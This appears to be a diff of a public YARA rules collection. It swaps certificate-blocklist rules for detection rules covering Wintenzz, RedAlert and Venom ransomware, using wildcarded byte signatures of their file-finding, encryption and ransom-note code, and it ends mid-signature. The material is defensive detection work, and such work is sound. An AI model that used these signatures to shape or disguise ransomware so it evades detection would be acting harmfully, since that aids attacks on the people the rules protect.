logic_hash = "4f8af4a5c9812e6559218e387e32bc02cb0adcd40d9d4963fefc929f6101ae9a" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win64.Ransomware.Wintenzz.yara#L1-L83" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "ff4bdf2f6ee185b98d0014b3066806fe7e25ea94f46837948bc5262440bf8a56" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Wintenzz" + tc_detection_factor = 5 importance = 25 + strings: + $find_files = { + 48 8D 75 ?? 41 B8 ?? ?? ?? ?? 48 89 F1 31 D2 E8 ?? ?? ?? ?? 48 89 F9 48 89 F2 E8 ?? + ?? ?? ?? 48 83 F8 ?? 0F 84 ?? ?? ?? ?? 48 89 C6 48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ?? + ?? ?? 0F 28 85 ?? ?? ?? ?? 0F 29 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? + ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 0F 28 05 ?? ?? ?? ?? 0F 11 00 0F 28 85 ?? ?? ?? + ?? 0F 11 40 ?? 48 8B 8D ?? ?? ?? ?? 48 89 48 ?? 49 89 77 ?? 49 89 47 ?? 41 C7 47 ?? + ?? ?? ?? ?? 49 8D 4F ?? 48 8D 55 ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 40 B6 ?? 31 C0 + 49 89 07 48 85 DB 75 ?? EB ?? E8 ?? ?? ?? ?? 48 C1 E0 ?? 49 89 47 ?? 49 C7 47 ?? ?? + ?? ?? ?? B8 ?? ?? ?? ?? 31 F6 49 89 07 48 85 DB 74 ?? 48 01 DB 74 ?? 41 B8 ?? ?? ?? + ?? 48 89 F9 48 89 DA E8 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 85 D2 74 ?? 41 B8 ?? ?? + ?? ?? 4C 89 F1 E8 ?? ?? ?? ?? 40 84 F6 75 ?? 48 8B 8D ?? ?? ?? ?? 48 85 C9 74 ?? 48 + 8B 95 ?? ?? ?? ?? 48 85 D2 74 ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 F8 48 81 C4 + ?? ?? ?? ?? 5B 5F 5E 41 5E 41 5F 5D C3 BA + } + $encrypt_files_p1 = { + 4C 89 75 ?? 48 8D 05 ?? ?? ?? ?? 48 89 45 ?? 48 8D 05 ?? ?? ?? ?? 48 89 45 ?? 48 8D + 05 ?? ?? ?? ?? 48 89 45 ?? 48 8D 05 ?? ?? ?? ?? 48 89 45 ?? 48 C7 45 ?? ?? ?? ?? ?? + 48 C7 45 ?? ?? ?? ?? ?? 48 89 7D ?? 48 C7 45 ?? ?? ?? ?? ?? 48 8D 4D ?? 48 8D 55 ?? + E8 ?? ?? ?? ?? 0F 10 45 ?? 0F 29 45 ?? 48 8B 45 ?? 48 89 45 ?? 48 8D 4D ?? 48 8D 55 + ?? E8 ?? ?? ?? ?? 48 85 DB 74 ?? BA ?? ?? ?? ?? 48 89 D9 E8 ?? ?? ?? ?? 48 85 C0 75 + ?? BA ?? ?? ?? ?? 48 89 D9 E8 + } + $encrypt_files_p2 = { + 86 97 ?? ?? ?? ?? C0 74 3C ?? ?? C1 E8 ?? 28 03 00 48 ?? C0 74 2F ?? ?? FA 03 75 ?? + 48 8D 0D ?? ?? ?? ?? 48 39 C8 0F 84 ?? ?? ?? ?? 0F B7 08 81 F1 ?? ?? ?? ?? 0F B6 40 + ?? 83 F0 ?? 66 09 C8 0F 84 ?? ?? ?? ?? 48 8B 4D ?? 48 8B 55 ?? E8 ?? ?? ?? ?? 48 85 + C0 74 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 85 C0 74 ?? 48 83 FA ?? 75 ?? 48 8D 0D ?? ?? ?? + ?? 48 39 C8 0F 84 ?? ?? ?? ?? 81 38 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 48 8B 4D ?? 48 8B + 55 ?? E8 ?? ?? ?? ?? 48 85 C0 74 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 85 C0 74 ?? 48 83 FA + ?? 75 ?? 48 8D 0D ?? ?? ?? ?? 48 39 C8 0F 84 ?? ?? ?? ?? 0F B7 08 81 F1 ?? ?? ?? ?? + 0F B6 40 ?? 83 F0 ?? 66 09 C8 0F 84 ?? ?? ?? ?? 48 8B 4D ?? 48 8B 55 ?? E8 ?? ?? ?? + ?? 48 85 C0 74 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 85 C0 74 ?? 48 83 FA ?? 75 ?? 48 8D 0D + ?? ?? ?? ?? 48 39 C8 0F 84 ?? ?? ?? ?? 0F B7 08 81 F1 ?? ?? ?? ?? 0F B6 40 ?? 83 F0 + ?? 66 09 C8 0F 84 ?? ?? ?? ?? 48 8B 4D + } + $drop_ransom_note = { + 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 85 D2 74 ?? 48 8B 8D ?? ?? + ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 85 D2 74 ?? 48 8B 8D + ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 85 D2 74 ?? 48 + 8B 8D ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 85 D2 74 + ?? 48 8B 8D ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 85 + D2 74 ?? 48 8B 8D ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? + 48 85 D2 74 ?? 48 8B 8D ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 95 ?? ?? + ?? ?? 48 85 D2 74 ?? 48 8B 8D ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 40 84 F6 + 0F 85 ?? ?? ?? ?? 48 8B 55 ?? 48 85 D2 74 ?? 41 B8 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? + E8 ?? ?? ?? ?? 48 8B 55 ?? 48 85 D2 74 ?? 41 B8 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? E8 + ?? ?? ?? ?? 48 8B 55 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "P2N ONLINE LTD" and pe.signatures[i].serial=="61:da:67:6c:1d:cf:cf:18:82:76:e2:c7:0d:68:08:2e" and 1552723954<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($find_files) and ( all of ($encrypt_files_*)) and ($drop_ransom_note) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_767436921B2698Bd18400A24B01341B6 : INFO FILE +rule REVERSINGLABS_Linux_Ransomware_Redalert : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects RedAlert ransomware." author = "ReversingLabs" - id = "3e3b2b75-9416-5c4f-ad47-88f92039f532" - date = "2023-11-08" - modified = "2023-11-08" + id = "ec7567bf-2c39-529f-ae93-74270a161827" + date = "2022-09-01" + modified = "2022-09-01" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L3158-L3174" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "759bbbc5929463ad68d5dcd28b30401b9ff680f522172ed8d5d7dd3772e07587" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Linux.Ransomware.RedAlert.yara#L1-L146" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "fe0d10c2ef1dacdb5374f319e470274b91f4f171db49de8c89e8aaa9aa75a45c" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "RedAlert" + tc_detection_factor = 5 importance = 25 + strings: + $encrypt_files_p1 = { + 41 57 41 56 41 55 41 54 55 53 48 81 EC ?? ?? ?? ?? 48 89 74 24 ?? BE ?? ?? ?? ?? 48 + 89 54 24 ?? 48 89 4C 24 ?? 4C 89 44 24 ?? E8 ?? ?? ?? ?? 48 85 C0 48 89 C5 75 ?? BF + ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 48 89 C7 E8 ?? ?? ?? ?? 83 F8 ?? 89 C3 75 ?? BF ?? + ?? ?? ?? E8 ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 31 C0 E9 ?? ?? ?? ?? 48 8D 54 24 ?? + 89 C6 BF ?? ?? ?? ?? E8 ?? ?? ?? ?? FF C0 75 ?? BF ?? ?? ?? ?? EB ?? 4C 8B B4 24 ?? + ?? ?? ?? 4D 85 F6 7F ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 DF E8 ?? ?? ?? ?? EB ?? 49 + 81 FE ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 0F 97 44 24 ?? 49 81 FE ?? ?? ?? ?? 0F 97 + 44 24 ?? 80 7C 24 ?? ?? 74 ?? BA ?? ?? ?? ?? 4C 89 F0 C7 44 24 ?? ?? ?? ?? ?? 48 89 + D3 31 D2 48 F7 F3 48 6B C8 ?? 48 89 4C 24 ?? 49 81 FE ?? ?? ?? ?? 77 ?? 4D 89 F4 41 + BD ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? EB ?? 41 BC ?? ?? ?? ?? 45 31 ED C7 44 24 ?? + ?? ?? ?? ?? 4D 63 FD C7 44 24 ?? ?? ?? ?? ?? 4C 0F AF 7C 24 ?? E9 ?? ?? ?? ?? 80 7C + 24 ?? ?? 74 ?? 45 85 ED 74 ?? 80 7C 24 ?? ?? 74 ?? 41 8D 45 ?? 3B 44 24 ?? 4C 89 FE + 75 ?? 49 8D B6 ?? ?? ?? ?? EB ?? 31 F6 31 D2 48 89 EF E8 ?? ?? ?? ?? 48 63 7C 24 ?? + 48 89 E9 4C 89 E2 48 03 7C 24 ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 39 E0 74 ?? BF ?? + ?? ?? ?? EB ?? 44 01 64 24 ?? 41 FF C5 44 3B 6C 24 ?? 0F 85 ?? ?? ?? ?? 48 8D 9C 24 + ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 84 C0 74 ?? BF ?? + ?? ?? ?? EB ?? 48 8D BC 24 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 DE E8 ?? ?? ?? ?? 85 C0 + 74 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 63 6C 24 ?? 45 89 E7 44 89 64 24 ?? 4C 0F AF + 6C 24 ?? C6 44 24 ?? ?? C7 44 24 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 4C 8B 4C 24 ?? 41 B8 + ?? ?? ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 84 + } + $encrypt_files_p2 = { + C0 75 ?? 48 8B 54 24 ?? 48 8B 7C 24 ?? 48 89 E9 BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F B7 + 15 ?? ?? ?? ?? 48 39 D0 75 ?? 48 8B 44 24 ?? 48 89 E9 BE ?? ?? ?? ?? 0F B7 50 ?? 48 + 8B 38 E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 0F B7 51 ?? 48 39 D0 74 ?? BF ?? ?? ?? ?? E9 ?? + ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 4C 03 7C 24 ?? 44 3B 6C 24 ?? 0F 8C ?? ?? ?? ?? E9 + ?? ?? ?? ?? BF ?? ?? ?? ?? EB ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 80 7C + 24 ?? ?? 74 ?? 83 7C 24 ?? ?? 74 ?? 80 7C 24 ?? ?? 74 ?? 8B 44 24 ?? 4C 89 EE FF C0 + 3B 44 24 ?? 75 ?? 49 8D B6 ?? ?? ?? ?? EB ?? 31 F6 31 D2 48 89 EF E8 ?? ?? ?? ?? 48 + 63 44 24 ?? 48 8B 5C 24 ?? 48 8D B4 24 ?? ?? ?? ?? 48 8D BC 24 ?? ?? ?? ?? 31 C9 31 + D2 45 89 E1 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 48 01 C3 48 8D 84 24 ?? + ?? ?? ?? 49 89 D8 48 89 1C 24 48 89 44 24 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? + 48 89 E9 4C 89 E2 BE ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 4C 39 E0 0F 85 ?? ?? ?? ?? + FF 44 24 ?? 8B 54 24 ?? 8B 4C 24 ?? 01 54 24 ?? 39 4C 24 ?? 75 ?? 31 F6 BA ?? ?? ?? + ?? 48 89 EF E8 ?? ?? ?? ?? 48 8D BC 24 ?? ?? ?? ?? 48 89 E9 BA ?? ?? ?? ?? BE ?? ?? + ?? ?? E8 ?? ?? ?? ?? 8A 5C 24 ?? 48 83 F8 ?? B0 ?? 0F 44 D8 44 3B 7C 24 ?? 88 5C 24 + ?? 74 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 44 03 7C 24 ?? 4C 03 6C 24 ?? 8B 44 24 ?? 39 + 44 24 ?? 0F 8C ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 0F B6 44 24 ?? 48 81 C4 ?? ?? ?? + ?? 5B 5D 41 5C 41 5D 41 5E 41 5F C3 + } + $find_files_p1 = { + 41 57 FC 41 56 41 55 41 54 49 89 FC 55 53 48 83 EC ?? 48 8B 84 24 ?? ?? ?? ?? 48 89 + 4C 24 ?? 48 83 C9 ?? 48 89 74 24 ?? 4C 89 44 24 ?? 4C 89 4C 24 ?? 88 54 24 ?? 48 89 + 44 24 ?? 48 8B 84 24 ?? ?? ?? ?? 44 8A BC 24 ?? ?? ?? ?? 48 89 44 24 ?? 48 8B 84 24 + ?? ?? ?? ?? 48 89 44 24 ?? 48 8B 84 24 ?? ?? ?? ?? 48 89 44 24 ?? 31 C0 F2 AE 4C 89 + E7 48 F7 D1 4C 8D 71 ?? E8 ?? ?? ?? ?? 48 85 C0 48 89 44 24 ?? 0F 85 ?? ?? ?? ?? E8 + ?? ?? ?? ?? 8B 38 E8 ?? ?? ?? ?? 48 83 C4 ?? 4C 89 E6 48 89 C2 5B 5D 41 5C 41 5D 41 + 5E 41 5F BF ?? ?? ?? ?? 31 C0 E9 ?? ?? ?? ?? 45 84 FF 48 8D 6B ?? 74 ?? 0F B6 4B ?? + 48 89 EA 4C 89 E6 BF ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? 80 7B ?? ?? 0F 85 ?? ?? ?? ?? + 80 7C 24 ?? ?? 0F 84 ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 85 C0 0F 84 + ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? BE ?? ?? + ?? ?? 48 89 EF E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? FC 31 C0 48 83 C9 ?? 48 89 EF + F2 AE 4C 89 F0 48 29 C8 48 3B 44 24 ?? 76 ?? 48 8B 3D ?? ?? ?? ?? 48 89 E9 4C 89 E2 + BE ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 4B 8D 1C 34 48 89 EE 48 8D 7B ?? + C6 03 ?? E8 ?? ?? ?? ?? 41 0F B6 C7 4C 8B 4C 24 ?? 4C 8B 44 24 ?? 89 44 24 ?? 48 8B + 44 24 ?? BA ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8B 74 24 ?? 4C 89 E7 48 89 44 24 ?? 48 8B + } + $find_files_p2 = { + 44 24 ?? 48 89 44 24 ?? 48 8B 44 24 ?? 48 89 44 24 ?? 48 8B 44 24 ?? 48 89 04 24 E8 + ?? ?? ?? ?? E9 ?? ?? ?? ?? 45 84 FF 0F 85 ?? ?? ?? ?? FC 48 83 C9 ?? 48 89 EF 44 88 + F8 F2 AE 48 8B 54 24 ?? 48 89 EF 48 89 CB 48 8B 4C 24 ?? 48 F7 D3 48 89 DE 4C 8D 6B + ?? E8 ?? ?? ?? ?? 84 C0 74 ?? 48 89 EA 4C 89 E6 BF ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? + E9 ?? ?? ?? ?? 4C 89 EA BE ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? + ?? 48 89 DE 48 89 EF E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 4B 8D 1C 34 48 89 EA 4C + 89 E6 BF ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? 48 8D 7B ?? 48 89 EE C6 03 ?? E8 ?? ?? ?? + ?? 0F B7 0D ?? ?? ?? ?? 4C 89 E7 4C 8B 44 24 ?? 48 8B 54 24 ?? 48 8B 74 24 ?? FF 15 + ?? ?? ?? ?? 84 C0 BF ?? ?? ?? ?? 74 ?? 48 8B 7C 24 ?? B9 ?? ?? ?? ?? 4C 89 E2 BE ?? + ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? 48 8B 74 24 ?? 4C 89 E7 E8 ?? ?? ?? ?? 85 C0 74 ?? BF + ?? ?? ?? ?? E8 ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 7C 24 ?? 41 8D 56 ?? + 4C 89 E6 E8 ?? ?? ?? ?? C6 03 ?? 48 8B 7C 24 ?? E8 ?? ?? ?? ?? 48 85 C0 48 89 C3 0F + 85 ?? ?? ?? ?? 48 8B 7C 24 ?? 48 83 C4 ?? 5B 5D 41 5C 41 5D 41 5E 41 5F E9 + } + $setup_environment = { + 55 48 89 E5 41 56 49 89 F6 BE ?? ?? ?? ?? 41 55 41 54 53 48 89 FB 48 83 EC ?? E8 ?? + ?? ?? ?? 48 85 C0 49 89 C4 75 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 7D ?? E8 ?? ?? + ?? ?? 84 C0 BF ?? ?? ?? ?? 74 ?? BE ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48 85 C0 49 + 89 C4 74 ?? 0F B7 55 ?? 48 8B 7D ?? 48 89 C1 BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F B7 55 + ?? 48 8B 7D ?? 4C 89 E1 BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F B7 55 ?? 31 C9 39 C2 0F 85 + ?? ?? ?? ?? E9 ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? BF ?? ?? ?? + ?? 49 89 E5 E8 ?? ?? ?? ?? 66 8B 3D ?? ?? 22 00 66 03 3D ?? ?? 22 00 66 8B 05 ?? ?? + 22 00 66 89 7D ?? 0F B7 FF 66 89 45 ?? E8 ?? ?? ?? ?? 0F B7 7D ?? 48 89 45 ?? E8 ?? + ?? ?? ?? 0F B7 55 ?? 48 8B 7D ?? 4C 89 E1 BE ?? ?? ?? ?? 48 89 45 ?? E8 ?? ?? ?? ?? + 0F B7 55 ?? 48 8B 7D ?? 4C 89 E1 BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 75 ?? BF ?? ?? + ?? ?? 31 C0 E8 ?? ?? ?? ?? 0F B7 45 ?? 0F B7 35 ?? ?? ?? ?? 31 C9 48 8B 7D ?? 48 83 + C0 ?? 25 ?? ?? ?? ?? 48 29 C4 48 8D 5C 24 ?? 48 83 E3 ?? 48 89 DA E8 ?? ?? ?? ?? 48 + 89 DE BF ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? 0F B7 3D ?? ?? ?? ?? BE ?? ?? ?? ?? 48 03 + 7D ?? E8 ?? ?? ?? ?? 66 39 05 ?? ?? 22 00 74 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 + EC 31 C9 EB ?? 4C 89 E7 E8 ?? ?? ?? ?? 48 8D 75 ?? B9 ?? ?? ?? ?? 4C 89 F7 FC F3 A5 + B1 ?? EB ?? 4C 89 EC EB ?? 48 8D 65 ?? 89 C8 5B 41 5C 41 5D 41 5E C9 C3 + } + $make_configuration = { + 41 56 BE ?? ?? ?? ?? 49 89 FE BF ?? ?? ?? ?? 41 55 41 54 55 53 48 83 EC ?? E8 ?? ?? + ?? ?? 84 C0 88 C3 74 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 31 FF EB ?? BF ?? ?? ?? ?? E8 + ?? ?? ?? ?? BA ?? ?? ?? ?? 0F B7 F0 BF ?? ?? ?? ?? E8 ?? ?? ?? ?? BF ?? ?? ?? ?? E8 + ?? ?? ?? ?? B9 ?? ?? ?? ?? 49 89 C4 48 89 C2 BE ?? ?? ?? ?? BF ?? ?? ?? ?? 66 C7 00 + ?? ?? C6 40 ?? ?? E8 ?? ?? ?? ?? 4C 89 E6 BF ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? 48 89 + E6 4C 89 E7 E8 ?? ?? ?? ?? 84 C0 75 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? BF ?? ?? ?? ?? + E8 ?? ?? ?? ?? FC 88 D8 BF ?? ?? ?? ?? 48 83 C9 ?? F2 AE 48 F7 D1 48 FF C9 8D 59 ?? + 83 C1 ?? 48 63 F9 E8 ?? ?? ?? ?? 48 85 C0 48 89 C5 0F 84 ?? ?? ?? ?? 48 8D 78 ?? 48 + 63 D3 BE ?? ?? ?? ?? C6 00 ?? E8 ?? ?? ?? ?? 48 89 EF BE ?? ?? ?? ?? E8 ?? ?? ?? ?? + 48 85 C0 48 89 C3 BF ?? ?? ?? ?? 74 ?? 0F B7 54 24 ?? 48 8B 7C 24 ?? 48 89 C1 BE ?? + ?? ?? ?? E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? BF ?? ?? ?? + ?? E8 ?? ?? ?? ?? 4C 89 E7 E8 ?? ?? ?? ?? 4C 89 F7 48 89 E6 B9 ?? ?? ?? ?? FC F3 A5 + 48 83 C4 ?? 5B 5D 41 5C 41 5D 41 5E C3 BF ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "REBROSE LEISURE LIMITED" and pe.signatures[i].serial=="76:74:36:92:1b:26:98:bd:18:40:0a:24:b0:13:41:b6" and 1556284480<=pe.signatures[i].not_after) + uint32(0)==0x464C457F and ($setup_environment) and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) and ($make_configuration) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_3E795531B3265510F935187Eca59920A : INFO FILE +rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Venom : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Venom ransomware." author = "ReversingLabs" - id = "953434f4-cc19-5a0a-923b-4deaadacef00" - date = "2023-11-08" - modified = "2023-11-08" + id = "72149ec2-888e-5bed-baf1-0ec44e48328e" + date = "2022-06-06" + modified = "2022-06-06" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L3176-L3192" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "d597e88314f9f20283b40058dd74167d0d72f7518277a57f26c15e44b670b386" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/ByteCode.MSIL.Ransomware.Venom.yara#L1-L68" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "5817ece6a1cc304835f7fc243c4cfdc3c7cacd2251a9ac294a6662b58d2552e8" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Venom" + tc_detection_factor = 5 importance = 25 + strings: + $setup_env = { + 00 28 ?? ?? ?? ?? 0A 73 ?? ?? ?? ?? 0B 07 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 07 1B + 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 07 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 07 1F ?? 28 + ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 07 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 07 6F ?? ?? + ?? ?? 13 ?? 2B ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 00 06 11 ?? 28 ?? ?? ?? ?? 00 00 12 ?? 28 + ?? ?? ?? ?? 2D ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DC 72 ?? ?? ?? ?? 1F + ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 72 ?? ?? ?? ?? 1F ?? + 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 1F ?? 28 ?? ?? ?? ?? 72 + ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 72 ?? ?? ?? ?? 1F ?? 28 ?? ?? ?? ?? 72 ?? + ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 20 ?? ?? ?? ?? 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? + ?? 28 ?? ?? ?? ?? 0C 72 ?? ?? ?? ?? 20 ?? ?? ?? ?? 19 7E ?? ?? ?? ?? 19 16 7E ?? ?? ?? + ?? 28 ?? ?? ?? ?? 0D 09 08 20 ?? ?? ?? ?? 12 ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 17 28 + ?? ?? ?? ?? 00 2A + } + $find_files = { + 00 00 00 03 28 ?? ?? ?? ?? 0A 16 0B 2B ?? 06 07 9A 0C 00 00 08 72 ?? ?? ?? ?? 6F ?? ?? + ?? ?? 16 FE 01 0D 09 2C ?? 00 08 02 28 ?? ?? ?? ?? 00 00 00 DE ?? 26 00 00 DE ?? 00 07 + 17 58 0B 07 06 8E 69 32 ?? 00 03 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11 ?? 11 ?? 9A 13 + ?? 00 11 ?? 02 28 ?? ?? ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 32 ?? 00 DE ?? + 26 00 00 DE ?? 2A + } + $encrypt_files = { + 00 28 ?? ?? ?? ?? 0A 28 ?? ?? ?? ?? 03 6F ?? ?? ?? ?? 0B 02 72 ?? ?? ?? ?? 28 ?? ?? ?? + ?? 18 73 ?? ?? ?? ?? 0C 73 ?? ?? ?? ?? 0D 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 09 20 ?? + ?? ?? ?? 6F ?? ?? ?? ?? 00 09 18 6F ?? ?? ?? ?? 00 07 06 20 ?? ?? ?? ?? 73 ?? ?? ?? ?? + 13 ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 09 11 ?? 09 6F + ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 09 17 6F ?? ?? ?? ?? 00 08 06 16 06 + 8E 69 6F ?? ?? ?? ?? 00 08 09 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 02 19 73 ?? ?? ?? + ?? 13 ?? 20 ?? ?? ?? ?? 8D ?? ?? ?? ?? 13 ?? 00 2B ?? 00 11 ?? 11 ?? 16 11 ?? 6F ?? ?? + ?? ?? 00 00 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 25 13 ?? 16 FE 02 13 ?? 11 ?? 2D + ?? 11 ?? 6F ?? ?? ?? ?? 00 00 DE ?? 13 ?? 00 11 